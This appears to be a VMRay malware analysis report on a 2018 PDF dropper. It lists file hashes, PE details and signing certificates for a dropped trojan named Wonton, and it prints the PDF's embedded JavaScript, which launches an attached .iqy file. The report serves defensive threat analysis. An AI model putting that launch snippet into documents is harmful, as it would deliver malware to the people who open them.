2c5729e1...d7c6 | Files
Logo
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Trojan, Dropper, Downloader

2c5729e17b64cd4e905ccfeabbc913ed945e17625c35ec1d6932194aae83d7c6 (SHA256)

DOC_443353149786_10082018.pdf

PDF Document

Created at 2018-08-10 12:36:00

...

Notifications (2/2)

The overall sleep time of all monitored processes was truncated from "20 minutes, 15 seconds" to "2 minutes" to reveal dormant functionality.

The operating system was rebooted during the analysis.

Filters:
Filename Category Type Severity Actions
C:\Users\BMe1N39jU1 6criBQ\AppData\Local\Temp\cmd_.exe Created File Binary
Blacklisted
...
»
Mime Type application/x-dosexec
File Size 101.61 KB
MD5 5473299167525c8d0addb8248900606a Copy to Clipboard
SHA1 fa99241ee9581f281544423881cf702375d33c23 Copy to Clipboard
SHA256 bc1fc69f9747dc034ece7d9bb795c5e596d9be6ca71efe75c6c0fd18f3cbfbf5 Copy to Clipboard
SSDeep 3072:Zb7luhxIgK+DNYIiRs1T8M7Eu6KX1wke3G:Zb7luYgKKNxiRsOM7E0QW Copy to Clipboard
ImpHash e8f2df81b7f95f75c926f6d64aa71cb5 Copy to Clipboard
File Reputation Information
»
Severity
Blacklisted
First Seen 2018-08-10 10:35 (UTC+2)
Last Seen 2018-08-10 13:00 (UTC+2)
Names Win32.Trojan.Wonton
Families Wonton
Classification Trojan
PE Information
»
Image Base 0x400000
Entry Point 0x407209
Size Of Code 0x11600
Size Of Initialized Data 0x6600
File Type executable
Subsystem windows_gui
Machine Type i386
Compile Timestamp 2018-08-09 13:23:42+00:00
Sections (5)
»
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x401000 0x11581 0x11600 0x400 cnt_code, mem_execute, mem_read 6.66
.rdata 0x413000 0x31d4 0x3200 0x11a00 cnt_initialized_data, mem_read 5.2
.data 0x417000 0x54e0 0x1600 0x14c00 cnt_initialized_data, mem_read, mem_write 4.71
.rsrc 0x41d000 0x1b4 0x200 0x16200 cnt_initialized_data, mem_read 5.11
.reloc 0x41e000 0x1a12 0x1c00 0x16400 cnt_initialized_data, mem_discardable, mem_read 4.56
Imports (3)
»
KERNEL32.dll (71)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GlobalAlloc 0x0 0x413008 0x15b6c 0x1456c 0x2b3
GlobalFree 0x0 0x41300c 0x15b70 0x14570 0x2ba
GetTickCount 0x0 0x413010 0x15b74 0x14574 0x293
GetSystemTime 0x0 0x413014 0x15b78 0x14578 0x277
CreateDirectoryW 0x0 0x413018 0x15b7c 0x1457c 0x81
Sleep 0x0 0x41301c 0x15b80 0x14580 0x4b2
LoadLibraryW 0x0 0x413020 0x15b84 0x14584 0x33f
GetLastError 0x0 0x413024 0x15b88 0x14588 0x202
lstrcatW 0x0 0x413028 0x15b8c 0x1458c 0x53f
lstrcpyW 0x0 0x41302c 0x15b90 0x14590 0x548
CloseHandle 0x0 0x413030 0x15b94 0x14594 0x52
CreateFileW 0x0 0x413034 0x15b98 0x14598 0x8f
WriteConsoleW 0x0 0x413038 0x15b9c 0x1459c 0x524
lstrlenW 0x0 0x41303c 0x15ba0 0x145a0 0x54e
MultiByteToWideChar 0x0 0x413040 0x15ba4 0x145a4 0x367
GetProcAddress 0x0 0x413044 0x15ba8 0x145a8 0x245
GetModuleHandleW 0x0 0x413048 0x15bac 0x145ac 0x218
ExitProcess 0x0 0x41304c 0x15bb0 0x145b0 0x119
DecodePointer 0x0 0x413050 0x15bb4 0x145b4 0xca
HeapFree 0x0 0x413054 0x15bb8 0x145b8 0x2cf
EncodePointer 0x0 0x413058 0x15bbc 0x145bc 0xea
GetSystemTimeAsFileTime 0x0 0x41305c 0x15bc0 0x145c0 0x279
GetCommandLineA 0x0 0x413060 0x15bc4 0x145c4 0x186
HeapSetInformation 0x0 0x413064 0x15bc8 0x145c8 0x2d3
GetStartupInfoW 0x0 0x413068 0x15bcc 0x145cc 0x263
TerminateProcess 0x0 0x41306c 0x15bd0 0x145d0 0x4c0
GetCurrentProcess 0x0 0x413070 0x15bd4 0x145d4 0x1c0
UnhandledExceptionFilter 0x0 0x413074 0x15bd8 0x145d8 0x4d3
SetUnhandledExceptionFilter 0x0 0x413078 0x15bdc 0x145dc 0x4a5
IsDebuggerPresent 0x0 0x41307c 0x15be0 0x145e0 0x300
GetCPInfo 0x0 0x413080 0x15be4 0x145e4 0x172
InterlockedIncrement 0x0 0x413084 0x15be8 0x145e8 0x2ef
InterlockedDecrement 0x0 0x413088 0x15bec 0x145ec 0x2eb
GetACP 0x0 0x41308c 0x15bf0 0x145f0 0x168
GetOEMCP 0x0 0x413090 0x15bf4 0x145f4 0x237
IsValidCodePage 0x0 0x413094 0x15bf8 0x145f8 0x30a
TlsAlloc 0x0 0x413098 0x15bfc 0x145fc 0x4c5
TlsGetValue 0x0 0x41309c 0x15c00 0x14600 0x4c7
TlsSetValue 0x0 0x4130a0 0x15c04 0x14604 0x4c8
TlsFree 0x0 0x4130a4 0x15c08 0x14608 0x4c6
SetLastError 0x0 0x4130a8 0x15c0c 0x1460c 0x473
GetCurrentThreadId 0x0 0x4130ac 0x15c10 0x14610 0x1c5
InitializeCriticalSectionAndSpinCount 0x0 0x4130b0 0x15c14 0x14614 0x2e3
DeleteCriticalSection 0x0 0x4130b4 0x15c18 0x14618 0xd1
LeaveCriticalSection 0x0 0x4130b8 0x15c1c 0x1461c 0x339
EnterCriticalSection 0x0 0x4130bc 0x15c20 0x14620 0xee
WriteFile 0x0 0x4130c0 0x15c24 0x14624 0x525
GetStdHandle 0x0 0x4130c4 0x15c28 0x14628 0x264
GetModuleFileNameW 0x0 0x4130c8 0x15c2c 0x1462c 0x214
HeapCreate 0x0 0x4130cc 0x15c30 0x14630 0x2cd
HeapSize 0x0 0x4130d0 0x15c34 0x14634 0x2d4
HeapAlloc 0x0 0x4130d4 0x15c38 0x14638 0x2cb
RaiseException 0x0 0x4130d8 0x15c3c 0x1463c 0x3b1
GetModuleFileNameA 0x0 0x4130dc 0x15c40 0x14640 0x213
FreeEnvironmentStringsW 0x0 0x4130e0 0x15c44 0x14644 0x161
WideCharToMultiByte 0x0 0x4130e4 0x15c48 0x14648 0x511
GetEnvironmentStringsW 0x0 0x4130e8 0x15c4c 0x1464c 0x1da
SetHandleCount 0x0 0x4130ec 0x15c50 0x14650 0x46f
GetFileType 0x0 0x4130f0 0x15c54 0x14654 0x1f3
QueryPerformanceCounter 0x0 0x4130f4 0x15c58 0x14658 0x3a7
GetCurrentProcessId 0x0 0x4130f8 0x15c5c 0x1465c 0x1c1
LCMapStringW 0x0 0x4130fc 0x15c60 0x14660 0x32d
GetStringTypeW 0x0 0x413100 0x15c64 0x14664 0x269
RtlUnwind 0x0 0x413104 0x15c68 0x14668 0x418
SetFilePointer 0x0 0x413108 0x15c6c 0x1466c 0x466
GetConsoleCP 0x0 0x41310c 0x15c70 0x14670 0x19a
GetConsoleMode 0x0 0x413110 0x15c74 0x14674 0x1ac
HeapReAlloc 0x0 0x413114 0x15c78 0x14678 0x2d2
IsProcessorFeaturePresent 0x0 0x413118 0x15c7c 0x1467c 0x304
SetStdHandle 0x0 0x41311c 0x15c80 0x14680 0x487
FlushFileBuffers 0x0 0x413120 0x15c84 0x14684 0x157
USER32.dll (1)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
wsprintfW 0x0 0x413128 0x15c8c 0x1468c 0x333
ADVAPI32.dll (1)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
RegEnumKeyW 0x0 0x413000 0x15b64 0x14564 0x250
Digital Signatures (2)
»
Certificate: CINECTIC LIMITED
»
Issued by CINECTIC LIMITED
Parent Certificate thawte SHA256 Code Signing CA
Country Name GB
Valid From 2017-10-31 00:00:00+00:00
Valid Until 2018-10-31 23:59:59+00:00
Algorithm sha256_rsa
Serial Number B3 08 2B 6F C3 F7 DE 00 A2 E2 68 B0 71 5F 76 3
Thumbprint BB 58 21 0B 6A B0 99 55 19 3C EA 32 89 40 A6 05 9F 49 B9 48
Certificate: thawte SHA256 Code Signing CA
»
Issued by thawte SHA256 Code Signing CA
Country Name US
Valid From 2013-12-10 00:00:00+00:00
Valid Until 2023-12-09 23:59:59+00:00
Algorithm sha256_rsa
Serial Number 71 A0 B7 36 95 DD B1 AF C2 3B 2B 9A 18 EE 54 CB
Thumbprint D0 0C FD BF 46 C9 8A 83 8B C1 0D C4 E0 97 AE 01 52 C4 61 BC
C:\Users\BMe1N39jU1 6criBQ\Desktop\DOC_443353149786_10082018.pdf Sample File PDF
Unknown
...
»
Mime Type application/pdf
File Size 1.79 KB
MD5 13cc8c748ab6beab2b942a9d04679511 Copy to Clipboard
SHA1 7bc60af7993f8bf3d595e98e87f8dd99d8e7182e Copy to Clipboard
SHA256 2c5729e17b64cd4e905ccfeabbc913ed945e17625c35ec1d6932194aae83d7c6 Copy to Clipboard
SSDeep 48:cfU1OG4oBCugVCn7V3P2oLaL7gjwmVLe9k+1SCZQy4Kv86u6I8:cfMEoBhgg7t2oOL7gsmVLeO+ECZQy4Kd Copy to Clipboard
PDF Information
»
Title -
Subject -
Author -
Creator -
Keywords -
Producer iTextSharp™ 5.5.10 ©2000-2016 iText Group NV (AGPL-version)
Page Count 1
Encrypted False
Create Time 2018-08-10 11:50:18+00:00
Modify Time 2018-08-10 11:50:18+00:00
Embedded JavaScript (2)
»
function rfunc900(){ var hadapet = {};hadapet['nLaunch'] = 2; hadapet['cName'] = '10082016.iqy'; hadapet['r2'] = 'exportDataObject'; this[hadapet['r2']](hadapet);} rfunc900();
bea0276c51bd6dbccb64110a8655fd623cbb9ebf6e0105c57f62e53e209361b6 Embedded File Text
Unknown
...
»
Parent File C:\Users\BMe1N39jU1 6criBQ\Desktop\DOC_443353149786_10082018.pdf
Mime Type text/plain
File Size 0.04 KB
MD5 47205fbbb191dbcab606007fd7612ba7 Copy to Clipboard
SHA1 b5806f9c13a41ff3991789a0320519156875efe2 Copy to Clipboard
SHA256 bea0276c51bd6dbccb64110a8655fd623cbb9ebf6e0105c57f62e53e209361b6 Copy to Clipboard
SSDeep 3:LyUyDzKXfGTKyREUOAXFovRyQ:LSDmPRyRYv1 Copy to Clipboard
Exit-Icon
WHOIS Domain Information
Domain Name
WHOIS Response 

       		
      

     

    

   

  

  

  

  

   

    
    

     Function Logfile
    

    

     

      Download-Icon
     

    

    

     Exit-Icon
    

   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image